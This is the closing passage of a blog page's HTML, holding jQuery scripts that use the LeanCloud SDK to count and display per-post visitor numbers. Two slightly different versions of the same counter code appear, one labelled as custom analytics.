        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  

  

  




<!-- custom analytics part create by xiamo -->
<script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.1.js"></script>
<script>AV.initialize("MRmUdkrxm6Eue1CWcj9t3Rvm-gzGzoHsz", "jNbXomvDbwDsLHOuRnx7mTPC");</script>
<script>
function showTime(Counter) {
	var query = new AV.Query(Counter);
	$(".leancloud_visitors").each(function() {
		var url = $(this).attr("id").trim();
		query.equalTo("url", url);
		query.find({
			success: function(results) {
				if (results.length == 0) {
					var content = '0 ' + $(document.getElementById(url)).text();
					$(document.getElementById(url)).text(content);
					return;
				}
				for (var i = 0; i < results.length; i++) {
					var object = results[i];
					var content = object.get('time') + ' ' + $(document.getElementById(url)).text();
					$(document.getElementById(url)).text(content);
				}
			},
			error: function(object, error) {
				console.log("Error: " + error.code + " " + error.message);
			}
		});

	});
}

function addCount(Counter) {
	var Counter = AV.Object.extend("Counter");
	url = $(".leancloud_visitors").attr('id').trim();
	title = $(".leancloud_visitors").attr('data-flag-title').trim();
	var query = new AV.Query(Counter);
	query.equalTo("url", url);
	query.find({
		success: function(results) {
			if (results.length > 0) {
				var counter = results[0];
				counter.fetchWhenSave(true);
				counter.increment("time");
				counter.save(null, {
					success: function(counter) {
						var content =  counter.get('time') + ' ' + $(document.getElementById(url)).text();
						$(document.getElementById(url)).text(content);
					},
					error: function(counter, error) {
						console.log('Failed to save Visitor num, with error message: ' + error.message);
					}
				});
			} else {
				var newcounter = new Counter();
				newcounter.set("title", title);
				newcounter.set("url", url);
				newcounter.set("time", 1);
				newcounter.save(null, {
					success: function(newcounter) {
					    console.log("newcounter.get('time')="+newcounter.get('time'));
						var content = newcounter.get('time') + ' ' + $(document.getElementById(url)).text();
						$(document.getElementById(url)).text(content);
					},
					error: function(newcounter, error) {
						console.log('Failed to create');
					}
				});
			}
		},
		error: function(error) {
			console.log('Error:' + error.code + " " + error.message);
		}
	});
}
$(function() {
	var Counter = AV.Object.extend("Counter");
	if ($('.leancloud_visitors').length == 1) {
		addCount(Counter);
	} else if ($('.post-title-link').length > 1) {
		showTime(Counter);
	}
}); 
</script>



</body>
</html>
